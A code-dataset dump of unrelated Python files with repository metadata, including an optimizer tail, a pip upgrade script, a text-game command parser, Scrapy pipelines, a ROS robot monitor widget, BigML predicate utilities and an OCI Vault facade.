for j in one2np1:
sim[j] = sim[0] + sigma * (sim[j] - sim[0])
fsim[j] = func(sim[j])
ind = numpy.argsort(fsim)
sim = numpy.take(sim, ind, 0)
fsim = numpy.take(fsim, ind, 0)
if callback is not None:
callback(sim[0])
iterations += 1
if retall:
allvecs.append(sim[0])
x = sim[0]
fval = numpy.min(fsim)
warnflag = 0
if fcalls[0] >= maxfun:
warnflag = 1
msg = _status_message["maxfev"]
if disp:
print("Warning: " + msg)
elif iterations >= maxiter:
warnflag = 2
msg = _status_message["maxiter"]
if disp:
print("Warning: " + msg)
else:
msg = _status_message["success"]
if disp:
print(msg)
print(" Current function value: %f" % fval)
print(" Iterations: %d" % iterations)
print(" Function evaluations: %d" % fcalls[0])
result = OptimizeResult(
fun=fval,
nit=iterations,
nfev=fcalls[0],
status=warnflag,
success=(warnflag == 0),
message=msg,
x=x,
)
if retall:
result["allvecs"] = allvecs
return result
| 26.077869
| 80
| 0.509194
|
eaedfd59190ad288f5447652b18cad9a710941b7
| 161
|
py
|
Python
|
main.py
|
justinhchae/app_courts
|
c46d48c4fa02cec91bda6fc3818ab677d6a83281
|
[
"MIT"
] | 4
|
2021-01-04T05:46:43.000Z
|
2022-01-06T16:33:40.000Z
|
main.py
|
justinhchae/app_courts
|
c46d48c4fa02cec91bda6fc3818ab677d6a83281
|
[
"MIT"
] | null | null | null |
main.py
|
justinhchae/app_courts
|
c46d48c4fa02cec91bda6fc3818ab677d6a83281
|
[
"MIT"
] | null | null | null |
from application.application import Application
if __name__ == '__main__':
app = Application()
def run_app():
app.run_app()
run_app()
| 11.5
| 47
| 0.63354
|
5f3cbf5c9e2b8330b90446a1604db5a6798a758e
| 193
|
py
|
Python
|
python/init/pip_upgrade.py
|
gangserver/py_test
|
869bdfa5c94c3b6a15b87e0c3de6b2cdaca821f4
|
[
"Apache-2.0"
] | null | null | null |
python/init/pip_upgrade.py
|
gangserver/py_test
|
869bdfa5c94c3b6a15b87e0c3de6b2cdaca821f4
|
[
"Apache-2.0"
] | null | null | null |
python/init/pip_upgrade.py
|
gangserver/py_test
|
869bdfa5c94c3b6a15b87e0c3de6b2cdaca821f4
|
[
"Apache-2.0"
] | null | null | null |
import pkg_resources
from subprocess import call
packages = [dist.project_name for dist in pkg_resources.working_set]
call("python -m pip install --upgrade " + ' '.join(packages), shell=True)
| 32.166667
| 73
| 0.772021
|
2080d6d8dba6ac7d40b50201274b7ae825d1ec75
| 2,484
|
py
|
Python
|
invadedhouse/commands/command_interpreter.py
|
redjoey/games
|
c30739e8363a5724f1c80eb3d2ce34e680cee48a
|
[
"MIT"
] | null | null | null |
invadedhouse/commands/command_interpreter.py
|
redjoey/games
|
c30739e8363a5724f1c80eb3d2ce34e680cee48a
|
[
"MIT"
] | 5
|
2019-12-15T19:29:22.000Z
|
2019-12-18T23:02:35.000Z
|
invadedhouse/commands/command_interpreter.py
|
redjoey/games
|
c30739e8363a5724f1c80eb3d2ce34e680cee48a
|
[
"MIT"
] | null | null | null |
from .attack import Attack
from .drop import Drop
from .enter import Enter
from .exit import Exit
from .help import Help
from .inventory import Inventory
from .look import Look
from .lookat import LookAt
from .loot import Loot
from .pickup import Pickup
from .rename import Rename
from .smash import Smash
from .startover import StartOver
from .warp import Warp
from .whereto import WhereTo
from models import House
from models import Player
class CommandInterpreter:
"""
Processes commands input by player at command prompt.
"""
def __init__(self, player: Player, house: House):
self.player = player
self.house = house
help_command = Help('help', player, house)
self.commands = [
Attack('attack', player, house),
Drop('drop', player, house),
Enter('enter', player, house),
Exit('exit', player, house),
help_command,
Inventory('inventory', player, house),
Look('look', player, house),
LookAt('look at', player, house),
Loot('loot', player, house),
Pickup('pickup', player, house),
Rename('change my name', player, house),
Smash('smash', player, house),
StartOver('start over', player, house),
Warp('warp', player, house),
WhereTo('where to', player, house)
]
help_command.set_all_commands(self.commands)
def run(self):
while True:
cmd = self.get_next_command()
self.interpret_command(cmd)
@staticmethod
def get_next_command() -> str:
cmd = input('> ')
return cmd
def interpret_command(self, command_str: str):
command_str = command_str.lower()
words = command_str.split()
matched_command_str = ''
text = ''
matched_command = None
for word in words:
if matched_command:
if len(text) > 0:
text += ' '
text += word
else:
if len(matched_command_str) > 0:
matched_command_str += ' '
matched_command_str += word
for cmd in self.commands:
if cmd.matches(matched_command_str):
matched_command = cmd
if matched_command:
matched_command.do(text)
else:
print('Sorry, I don\'t recognize that command.')
| 29.927711
| 60
| 0.572464
|
47cb52cd64268dd8f391726d47ba89c91e264627
| 1,607
|
py
|
Python
|
scrapy-examples/tutorial/tutorial/pipelines.py
|
Project-Sch/SpiderGarden
|
1928c9253815f79a03f7a6075dbe83add9a170c8
|
[
"Apache-2.0"
] | 2
|
2016-06-11T10:39:25.000Z
|
2017-03-03T04:25:23.000Z
|
scrapy-examples/tutorial/tutorial/pipelines.py
|
Project-Sch/SpiderGarden
|
1928c9253815f79a03f7a6075dbe83add9a170c8
|
[
"Apache-2.0"
] | null | null | null |
scrapy-examples/tutorial/tutorial/pipelines.py
|
Project-Sch/SpiderGarden
|
1928c9253815f79a03f7a6075dbe83add9a170c8
|
[
"Apache-2.0"
] | null | null | null |
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
from scrapy import signals
from scrapy.contrib.exporter import XmlItemExporter
class TutorialPipeline(object):
def process_item(self, item, spider):
for field in item:
print field + ': ' + item[field][0]
return item
class XmlExportPipeline(object):
def __init__(self):
self.files = {}
@classmethod
def from_crawler(cls, crawler):
pipeline = cls()
crawler.signals.connect(pipeline.spider_opened, signals.spider_opened)
crawler.signals.connect(pipeline.close_spider, signals.close_spider)
return pipeline
def spider_opened(self, spider):
file = open('%s_products.xml' % spider.name, 'w+b')
self.files[spider] = file
self.exporter = XmlItemExporter(file)
self.exporter.start_exporting()
def close_spider(self, spider):
self.exporter.finish_exporting()
file = self.files.pop(spider)
file.close()
def process_item(self, item, spider):
self.exporter.export_item(item)
return item
import json
import codecs
class JsonWithEncodingPipeline(object):
def __init__(self):
self.file = codecs.open('data_utf8.json', 'w', encoding='utf-8')
def process_item(self, item, spider):
line = json.dumps(dict(item), ensure_ascii=False) + "\n"
self.file.write(line)
return item
def close_spider(self, spider):
self.file.close()
| 26.783333
| 78
| 0.664592
|
e73cb0b3dc46495439b7b310ca6e2d0672297c86
| 1,143
|
py
|
Python
|
kde/frameworks/tier3/ktexteditor/ktexteditor.py
|
wrobelda/craft-blueprints-kde
|
366f460cecd5baebdf3a695696767c8c0e5e7c7e
|
[
"BSD-2-Clause"
] | null | null | null |
kde/frameworks/tier3/ktexteditor/ktexteditor.py
|
wrobelda/craft-blueprints-kde
|
366f460cecd5baebdf3a695696767c8c0e5e7c7e
|
[
"BSD-2-Clause"
] | 1
|
2020-01-10T01:06:16.000Z
|
2020-01-10T01:06:16.000Z
|
kde/frameworks/tier3/ktexteditor/ktexteditor.py
|
wrobelda/craft-blueprints-kde
|
366f460cecd5baebdf3a695696767c8c0e5e7c7e
|
[
"BSD-2-Clause"
] | 2
|
2020-01-02T18:22:12.000Z
|
2020-08-05T13:39:21.000Z
|
import info
class subinfo(info.infoclass):
def setTargets(self):
self.versionInfo.setDefaultValues()
self.description = "KTextEditor provides an advanced embeddable text editor"
def setDependencies(self):
self.buildDependencies["virtual/base"] = None
self.buildDependencies["kde/frameworks/extra-cmake-modules"] = None
self.runtimeDependencies["libs/libgit2"] = None
self.runtimeDependencies["kde/frameworks/tier1/karchive"] = None
self.runtimeDependencies["kde/frameworks/tier1/kconfig"] = None
self.runtimeDependencies["kde/frameworks/tier1/kguiaddons"] = None
self.runtimeDependencies["kde/frameworks/tier1/ki18n"] = None
self.runtimeDependencies["kde/frameworks/tier3/kio"] = None
self.runtimeDependencies["kde/frameworks/tier3/kparts"] = None
self.runtimeDependencies["kde/frameworks/tier1/sonnet"] = None
self.runtimeDependencies["kde/frameworks/tier1/syntax-highlighting"] = None
from Package.CMakePackageBase import *
class Package(CMakePackageBase):
def __init__(self):
CMakePackageBase.__init__(self)
| 38.1
| 84
| 0.721785
|
fefa704bd5f9296328de10ab4352c599231ba09d
| 11,871
|
py
|
Python
|
melodic/lib/python2.7/dist-packages/rqt_robot_monitor/robot_monitor.py
|
Dieptranivsr/Ros_Diep
|
d790e75e6f5da916701b11a2fdf3e03b6a47086b
|
[
"MIT"
] | 2
|
2021-07-14T12:33:55.000Z
|
2021-11-21T07:14:13.000Z
|
melodic/src/rqt_robot_monitor/src/rqt_robot_monitor/robot_monitor.py
|
disorn-inc/ROS-melodic-python3-Opencv-4.1.1-CUDA
|
3d265bb64712e3cd7dfa0ad56d78fcdebafdb4b0
|
[
"BSD-3-Clause"
] | 1
|
2021-07-08T10:26:06.000Z
|
2021-07-08T10:31:11.000Z
|
melodic/src/rqt_robot_monitor/src/rqt_robot_monitor/robot_monitor.py
|
disorn-inc/ROS-melodic-python3-Opencv-4.1.1-CUDA
|
3d265bb64712e3cd7dfa0ad56d78fcdebafdb4b0
|
[
"BSD-3-Clause"
] | null | null | null |
# Software License Agreement (BSD License)
#
# Copyright (c) 2012, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Author: Isaac Saito, Ze'ev Klapow, Austin Hendrix
import os
import rospkg
from diagnostic_msgs.msg import DiagnosticArray, DiagnosticStatus
from python_qt_binding import loadUi
from python_qt_binding.QtCore import QTimer, Signal, Qt, Slot
from python_qt_binding.QtGui import QPalette
from python_qt_binding.QtWidgets import QWidget, QTreeWidgetItem
import rospy
from rqt_robot_monitor.inspector_window import InspectorWindow
from rqt_robot_monitor.status_item import StatusItem
from rqt_robot_monitor.timeline_pane import TimelinePane
from rqt_robot_monitor.timeline import Timeline
import rqt_robot_monitor.util_robot_monitor as util
class RobotMonitorWidget(QWidget):
"""
NOTE: RobotMonitorWidget.shutdown function needs to be called
when the instance of this class terminates.
RobotMonitorWidget itself doesn't store previous diagnostic states.
It instead delegates that function to Timeline class.
"""
_TREE_ALL = 1
_TREE_WARN = 2
_TREE_ERR = 3
_message_updated = Signal(dict)
_queue_updated = Signal()
def __init__(self, context, topic=None):
"""
:param context: plugin context hook to enable adding widgets as a
ROS_GUI pane, 'PluginContext'
:param topic: Diagnostic topic to subscribe to 'str'
"""
super(RobotMonitorWidget, self).__init__()
rp = rospkg.RosPack()
ui_file = os.path.join(rp.get_path('rqt_robot_monitor'), 'resource',
'robotmonitor_mainwidget.ui')
loadUi(ui_file, self)
obj_name = 'Robot Monitor'
self.setObjectName(obj_name)
self.setWindowTitle(obj_name)
self._message_updated_processing = False
self._queue_updated_processing = False
# if we're given a topic, create a timeline. otherwise, don't
# this can be used later when writing an rqt_bag plugin
if topic:
# create timeline data structure
self._timeline = Timeline(topic, DiagnosticArray)
self._timeline.message_updated.connect(
self.message_updated, Qt.DirectConnection)
self._timeline.queue_updated.connect(
self.queue_updated, Qt.DirectConnection)
self._message_updated.connect(
self._signal_message_updated, Qt.QueuedConnection)
self._queue_updated.connect(
self._signal_queue_updated, Qt.QueuedConnection)
# create timeline pane widget
self._timeline_pane = TimelinePane(self, self._timeline.paused)
self._timeline_pane.pause_changed.connect(self._timeline.set_paused)
self._timeline_pane.position_changed.connect(self._timeline.set_position)
self._timeline.pause_changed.connect(self._timeline_pane.set_paused)
self._timeline.position_changed.connect(self._timeline_pane.set_position)
self.vlayout_top.addWidget(self._timeline_pane)
self._timeline_pane.show()
else:
self._timeline = None
self._timeline_pane = None
self._inspectors = {}
self.tree_all_devices.itemDoubleClicked.connect(self._tree_clicked)
self.warn_flattree.itemDoubleClicked.connect(self._tree_clicked)
self.err_flattree.itemDoubleClicked.connect(self._tree_clicked)
# TODO: resize on itemCollapsed and itemExpanded
self._is_stale = False
self._timer = QTimer()
self._timer.timeout.connect(self._update_message_state)
self._timer.start(1000)
palette = self.tree_all_devices.palette()
self._original_base_color = palette.base().color()
self._original_alt_base_color = palette.alternateBase().color()
self._tree = StatusItem(self.tree_all_devices.invisibleRootItem())
self._warn_tree = StatusItem(self.warn_flattree.invisibleRootItem())
self._err_tree = StatusItem(self.err_flattree.invisibleRootItem())
@Slot(dict)
def message_updated(self, status):
'''
This method just calls _signal_message_updated in 'best effort' manner.
This method should be called by signal with DirectConnection.
'''
if self._message_updated_processing:
return
self._message_updated_processing = True
self._message_updated.emit(status)
@Slot(dict)
def _signal_message_updated(self, status):
""" DiagnosticArray message callback """
# Walk the status array and update the tree
for name, status in status.items():
# Compute path and walk to appropriate subtree
path = name.split('/')
if path[0] == '':
path = path[1:]
tmp_tree = self._tree
for p in path:
tmp_tree = tmp_tree[p]
tmp_tree.update(status, util.get_resource_name(name))
# Check for warnings
if status.level == DiagnosticStatus.WARN:
self._warn_tree[name].update(status, name)
# Check for errors
if (status.level == DiagnosticStatus.ERROR or
status.level == DiagnosticStatus.STALE):
self._err_tree[name].update(status, name)
# For any items in the tree that were not updated, remove them
self._tree.prune()
self._warn_tree.prune()
self._err_tree.prune()
# TODO(ahendrix): implement
# Insight: for any item that is not OK, it only provides additional
# information if all of it's children are OK
#
# otherwise, it's just an aggregation of its children
# and doesn't provide any additional value when added to
# the warning and error flat trees
self.tree_all_devices.resizeColumnToContents(0)
self.warn_flattree.resizeColumnToContents(0)
self.err_flattree.resizeColumnToContents(0)
self._message_updated_processing = False
@Slot()
def queue_updated(self):
'''
This method just calls _signal_queue_updated in 'best effort' manner.
This method should be called by signal with DirectConnection.
'''
if self._queue_updated_processing:
return
self._queue_updated_processing = True
self._queue_updated.emit()
@Slot()
def _signal_queue_updated(self):
# update timeline pane
# collect worst status levels for each history
levels = [max([s.level for s in s.values()]) for s in self._timeline]
self._timeline_pane.set_levels(levels)
self._timeline_pane.redraw.emit()
self._queue_updated_processing = False
def resizeEvent(self, evt):
"""Overridden from QWidget"""
rospy.logdebug('RobotMonitorWidget resizeEvent')
if self._timeline_pane:
self._timeline_pane.redraw.emit()
@Slot(str)
def _inspector_closed(self, name):
""" Called when an inspector window is closed """
if name in self._inspectors:
del self._inspectors[name]
@Slot(QTreeWidgetItem, int)
def _tree_clicked(self, item, column):
"""
Slot to QTreeWidget.itemDoubleClicked
:type item: QTreeWidgetItem
:type column: int
"""
rospy.logdebug('RobotMonitorWidget _tree_clicked col=%d', column)
if item.name in self._inspectors:
self._inspectors[item.name].activateWindow()
else:
insp = InspectorWindow(None, item.name, self._timeline)
insp.show()
insp.closed.connect(self._inspector_closed)
self._inspectors[item.name] = insp
def _update_message_state(self):
""" Update the display if it's stale """
if self._timeline is not None:
if self._timeline.has_messages:
previous_stale_state = self._is_stale
self._is_stale = self._timeline.is_stale
time_diff = int(self._timeline.data_age)
msg_template = "Last message received %s %s ago"
if time_diff == 1:
msg = msg_template % (time_diff, "second")
else:
msg = msg_template % (time_diff, "seconds")
self._timeline_pane._msg_label.setText(msg)
if previous_stale_state != self._is_stale:
self._update_background_color()
else:
# no messages received yet
self._timeline_pane._msg_label.setText("No messages received")
def _update_background_color(self):
""" Update the background color based on staleness """
p = self.tree_all_devices.palette()
if self._is_stale:
p.setColor(QPalette.Base, Qt.darkGray)
p.setColor(QPalette.AlternateBase, Qt.lightGray)
else:
p.setColor(QPalette.Base, self._original_base_color)
p.setColor(QPalette.AlternateBase, self._original_alt_base_color)
self.tree_all_devices.setPalette(p)
self.warn_flattree.setPalette(p)
self.err_flattree.setPalette(p)
def shutdown(self):
"""
This needs to be called whenever this class terminates.
This closes all the instances on all trees.
Also unregisters ROS' subscriber, stops timer.
"""
rospy.logdebug('RobotMonitorWidget in shutdown')
names = self._inspectors.keys()
for name in names:
self._inspectors[name].close()
if self._timeline:
self._timeline.shutdown()
self._timer.stop()
del self._timer
def save_settings(self, plugin_settings, instance_settings):
instance_settings.set_value('splitter', self.splitter.saveState())
# TODO(ahendrix): persist the device paths, positions and sizes of any
# inspector windows
def restore_settings(self, plugin_settings, instance_settings):
if instance_settings.contains('splitter'):
self.splitter.restoreState(instance_settings.value('splitter'))
else:
self.splitter.setSizes([100, 100, 200])
# TODO(ahendrix): restore inspector windows
| 39.178218
| 85
| 0.665235
|
bc9c6956aab6c288dc419b3ee372744a4c5e47b6
| 10,150
|
py
|
Python
|
bigml/predicate_utils/utils.py
|
axellos162/python-4
|
569f6655871ea60b41e9442396433567b9daaea7
|
[
"Apache-2.0"
] | 137
|
2015-01-12T06:04:10.000Z
|
2022-03-06T21:00:04.000Z
|
bigml/predicate_utils/utils.py
|
axellos162/python-4
|
569f6655871ea60b41e9442396433567b9daaea7
|
[
"Apache-2.0"
] | 78
|
2015-01-13T18:28:51.000Z
|
2022-03-04T19:18:28.000Z
|
bigml/predicate_utils/utils.py
|
axellos162/python-4
|
569f6655871ea60b41e9442396433567b9daaea7
|
[
"Apache-2.0"
] | 144
|
2015-01-16T06:13:33.000Z
|
2022-03-29T17:53:16.000Z
|
# -*- coding: utf-8 -*-
#
# Copyright 2020-2021 BigML
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Common auxiliar functions to be used in the node predicate evaluation
"""
import operator
import re
from bigml.util import plural
# Operator Codes
LT = 0
LE = 1
EQ = 2
NE = 3
GE = 4
GT = 5
IN = 6
# Map operator string to its corresponding code
OPERATOR_CODE = {"<": LT,
"<=": LE,
"=": EQ,
"!=": NE,
"/=": NE,
">=": GE,
">": GT,
"in": IN}
# Map operator code to its corresponding function
OPERATOR = [operator.lt,
operator.le,
operator.eq,
operator.ne,
operator.ge,
operator.gt,
operator.contains]
INVERSE_OP = dict(zip(OPERATOR_CODE.values(), OPERATOR_CODE.keys()))
RELATIONS = {
'<=': 'no more than %s %s',
'>=': '%s %s at most',
'>': 'more than %s %s',
'<': 'less than %s %s'
}
TM_TOKENS = 'tokens_only'
TM_FULL_TERM = 'full_terms_only'
TM_ALL = 'all'
FULL_TERM_PATTERN = re.compile(r'^.+\b.+$', re.U)
OPERATION_OFFSET = 2
FIELD_OFFSET = 3
VALUE_OFFSET = 4
TERM_OFFSET = 5
MISSING_OFFSET = 6
PREDICATE_INFO_LENGTH = 5
def term_matches(text, forms_list, options):
""" Counts the number of occurences of the words in forms_list in the text
The terms in forms_list can either be tokens or full terms. The
matching for tokens is contains and for full terms is equals.
"""
token_mode = options.get('token_mode', TM_TOKENS)
case_sensitive = options.get('case_sensitive', False)
first_term = forms_list[0]
if token_mode == TM_FULL_TERM:
return full_term_match(text, first_term, case_sensitive)
return term_matches_tokens(text, forms_list, case_sensitive)
def is_full_term(term, field):
"""Returns a boolean showing if a term is considered as a full_term
"""
if term is not None:
# new optype has to be handled in tokens
if field['optype'] == 'items':
return False
options = field['term_analysis']
token_mode = options.get('token_mode', TM_TOKENS)
if token_mode == TM_FULL_TERM:
return True
if token_mode == TM_ALL:
return re.match(FULL_TERM_PATTERN, term)
return False
def full_term_match(text, full_term, case_sensitive):
"""Counts the match for full terms according to the case_sensitive option
"""
if not case_sensitive:
text = text.lower()
full_term = full_term.lower()
return 1 if text == full_term else 0
def get_tokens_flags(case_sensitive):
"""Returns flags for regular expression matching depending on text analysis
options
"""
flags = re.U
if not case_sensitive:
flags = (re.I | flags)
return flags
def term_matches_tokens(text, forms_list, case_sensitive):
"""Counts the number of occurences of the words in forms_list in the text
"""
flags = get_tokens_flags(case_sensitive)
expression = r'(\b|_)%s(\b|_)' % '(\\b|_)|(\\b|_)'.join([re.escape(term) \
for term in forms_list])
pattern = re.compile(expression, flags=flags)
matches = re.findall(pattern, text)
return len(matches)
def item_matches(text, item, options):
""" Counts the number of occurences of the item in the text
The matching considers the separator or
the separating regular expression.
"""
separator = options.get('separator', ' ')
regexp = options.get('separator_regexp')
if regexp is None:
regexp = r"%s" % re.escape(separator)
return count_items_matches(text, item, regexp)
def count_items_matches(text, item, regexp):
""" Counts the number of occurences of the item in the text
"""
expression = r'(^|%s)%s($|%s)' % (regexp, re.escape(item), regexp)
pattern = re.compile(expression, flags=re.U)
matches = re.findall(pattern, text)
return len(matches)
def apply_predicates(node, input_data, fields, normalize_repeats=False):
shift = 1 if normalize_repeats else 0
num_predicates = node[1 + shift]
predicates_ok = 0
for i in range(num_predicates):
operation = node[OPERATION_OFFSET + (PREDICATE_INFO_LENGTH * i) + shift]
field = node[FIELD_OFFSET + (PREDICATE_INFO_LENGTH * i) + shift]
value = node[VALUE_OFFSET + (PREDICATE_INFO_LENGTH * i) + shift]
term = node[TERM_OFFSET + (PREDICATE_INFO_LENGTH * i) + shift]
missing = node[MISSING_OFFSET + (PREDICATE_INFO_LENGTH * i) + shift]
predicate_ok = apply_predicate(operation, field, value, term, missing,
input_data, fields[field])
if predicate_ok:
predicates_ok += 1
return predicates_ok
def apply_predicate(operation, field, value, term, missing, input_data,
field_info):
"""Applies the operators defined in the predicate as strings to
the provided input data
"""
# for missing operators
if input_data.get(field) is None:
# text and item fields will treat missing values by following the
# doesn't contain branch
if term is None:
return missing or (
operation == EQ and value is None)
elif operation == NE and value is None:
return True
if term is not None:
if field_info['optype'] == 'text':
all_forms = field_info['summary'].get('term_forms', {})
term_forms = all_forms.get(term, [])
terms = [term]
terms.extend(term_forms)
options = field_info['term_analysis']
input_terms = term_matches(input_data.get(field, ""), terms,
options)
return OPERATOR[operation](input_terms, value)
# new items optype
options = field_info['item_analysis']
input_items = item_matches(input_data.get(field, ""), term,
options)
return OPERATOR[operation](input_items, value)
if operation == IN:
return OPERATOR[operation](value, input_data[field])
return OPERATOR[operation](input_data[field], value)
def pack_predicate(predicate):
"""Compacts the predicate condition
"""
node = list()
if predicate and predicate is not True:
operation = predicate.get('operator')
value = predicate.get('value')
missing = False
if operation.endswith("*"):
operation = operation[0: -1]
missing = True
elif operation == 'in' and None in value:
missing = True
node.append(OPERATOR_CODE.get(operation))
node.append(predicate.get('field'))
node.append(value)
node.append(predicate.get('term'))
node.append(missing)
else:
node.append(True)
return node
def predicate_to_rule(operation, field_info, value, term,
missing, label='name'):
"""Predicate condition string
"""
# externally forcing missing to True or False depending on the path
if missing is None:
missing = False
if label is not None:
name = field_info[label]
else:
name = ""
operation = INVERSE_OP[operation]
full_term = is_full_term(term, field_info)
relation_missing = " or missing" if missing else ""
if term is not None:
relation_suffix = ''
if ((operation == '<' and value <= 1) or
(operation == '<=' and value == 0)):
relation_literal = ('is not equal to' if full_term
else 'does not contain')
else:
relation_literal = 'is equal to' if full_term else 'contains'
if not full_term:
if operation != '>' or value != 0:
relation_suffix = (RELATIONS[operation] %
(value,
plural('time', value)))
return "%s %s %s %s%s" % (name, relation_literal,
term, relation_suffix,
relation_missing)
if value is None:
return "%s %s" % (name,
"is missing" if operation == '='
else "is not missing")
return "%s %s %s%s" % (name,
operation,
value,
relation_missing)
def to_lisp_rule(operation, field, value, term,
missing, field_info):
"""Builds rule string in LISP from a predicate
"""
if term is not None:
if field_info['optype'] == 'text':
options = field_info['term_analysis']
case_insensitive = not options.get('case_sensitive', False)
case_insensitive = 'true' if case_insensitive else 'false'
language = options.get('language')
language = "" if language is None else " %s" % language
return "(%s (occurrences (f %s) %s %s%s) %s)" % (
operation, field, term,
case_insensitive, language, value)
if field_info['optype'] == 'items':
return "(%s (if (contains-items? %s %s) 1 0) %s)" % (
operation, field, term, value)
if value is None:
negation = "" if operation == "=" else "not "
return "(%s missing? %s)" % (negation, field)
rule = "(%s (f %s) %s)" % (operation,
field,
value)
if missing:
rule = "(or (missing? %s) %s)" % (field, rule)
return rule
| 33.061889
| 80
| 0.591034
|
957fc248015ace0a7f263e6ab741f7bd28519c20
| 1,717
|
py
|
Python
|
visualiser/facades/ociVault.py
|
LaudateCorpus1/oci-designer-toolkit
|
4b6af0d8088ea3f3b61cb3b6076a1382c269d8b4
|
[
"UPL-1.0",
"Apache-2.0"
] | 186
|
2020-05-12T23:02:38.000Z
|
2022-03-25T04:29:25.000Z
|
visualiser/facades/ociVault.py
|
LaudateCorpus1/oci-designer-toolkit
|
4b6af0d8088ea3f3b61cb3b6076a1382c269d8b4
|
[
"UPL-1.0",
"Apache-2.0"
] | 145
|
2020-05-13T17:40:00.000Z
|
2022-03-22T17:27:11.000Z
|
visualiser/facades/ociVault.py
|
LaudateCorpus1/oci-designer-toolkit
|
4b6af0d8088ea3f3b61cb3b6076a1382c269d8b4
|
[
"UPL-1.0",
"Apache-2.0"
] | 96
|
2020-05-13T16:00:08.000Z
|
2022-03-25T06:22:12.000Z
|
#!/usr/bin/python
# Copyright (c) 2020, 2021, Oracle and/or its affiliates.
# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl.
"""Provide Module Description
"""
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
__author__ = ["Andrew Hopkinson (Oracle Cloud Solutions A-Team)"]
__version__ = "1.0.0"
__module__ = "ociVault"
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
import oci
from common.okitLogging import getLogger
from facades.ociConnection import OCIVaultConnection
# Configure logging
logger = getLogger()
class OCIVaults(OCIVaultConnection):
def __init__(self, config=None, configfile=None, profile=None, compartment_id=None):
self.compartment_id = compartment_id
self.vaults_json = []
super(OCIVaults, self).__init__(config=config, configfile=configfile, profile=profile)
def list(self, compartment_id=None, filter=None):
if compartment_id is None:
compartment_id = self.compartment_id
# Add filter to only return AVAILABLE Compartments
if filter is None:
filter = {}
if 'lifecycle_state' not in filter:
filter['lifecycle_state'] = 'AVAILABLE'
vaults = oci.pagination.list_call_get_all_results(self.client.list_vaults, compartment_id=compartment_id).data
# Convert to Json object
vaults_json = self.toJson(vaults)
logger.debug(str(vaults_json))
# Filter results
self.vaults_json = self.filterJsonObjectList(vaults_json, filter)
logger.debug(str(self.vaults_json))
return self.vaults_json
| 32.396226
| 118
| 0.631916
|
aeb629a1f8eb6e293971ff976d205dfe5f33e9da
| 331
|
py
|
Python
|
projects/noise/random_noise.py
|
JonasKoenig/CodeOnMyMind
|
d169a424f29d603f0510f98d265d68c26a333a6b
|
[
"MIT"
] | 3
|
2019-02-20T22:01:37.000Z
|
2022-03-02T20:06:16.000Z
|
projects/noise/random_noise.py
|
JonasKoenig/CodeOnMyMind
|
d169a424f29d603f0510f98d265d68c26a333a6b
|
[
"MIT"
] | null | null | null |
projects/noise/random_noise.py
|
JonasKoenig/CodeOnMyMind
|
d169a424f29d603f0510f98d265d68c26a333a6b
|
[
"MIT"
] | null | null | null |
import numpy as np
size = 32
np.random.seed(42)
# normalized random noise map
map = np.random.rand(size,size)
# pretty print
shades = [' ', '░░', '▒▒', '▓▓', '██']
string = ''
for y in range(0,size):
for x in range(0,size):
string += shades[int(np.floor(map[y][x]*(len(shades))))]
string += '\n'
print(string)
| 18.388889
| 64
| 0.577039
|
faf5ac080eff7d959686146df2863ac76246c818
| 7,800
|
py
|
Python
|
python/recommender.py
|
mpab/RobocodeML
|
30edd0395df54ef5a035cbecb70eddf2eb3a99ac
|
[
"Apache-2.0"
] | 1
|
2020-11-20T23:02:05.000Z
|
2020-11-20T23:02:05.000Z
|
python/recommender.py
|
mpab/RobocodeML
|
30edd0395df54ef5a035cbecb70eddf2eb3a99ac
|
[
"Apache-2.0"
] | 1
|
2022-03-04T04:16:56.000Z
|
2022-03-04T04:16:56.000Z
|
python/recommender.py
|
mpab/RobocodeML
|
30edd0395df54ef5a035cbecb70eddf2eb3a99ac
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
import random
import io
import copy
import util
import observations
import cfg
import models
import extractor
import features
import datasets
model_name = 'AdaBoost'
# features_classification_filter = 'pure_boolean_classified'
# target_filter = 'enemy_collisions'
__classification_metamodels__ = [None]
num_actions = 5
def make_key(features_classification, target_name):
return features_classification + '_' + model_name + '_' + target_name
def model_path(features_classification, target_name):
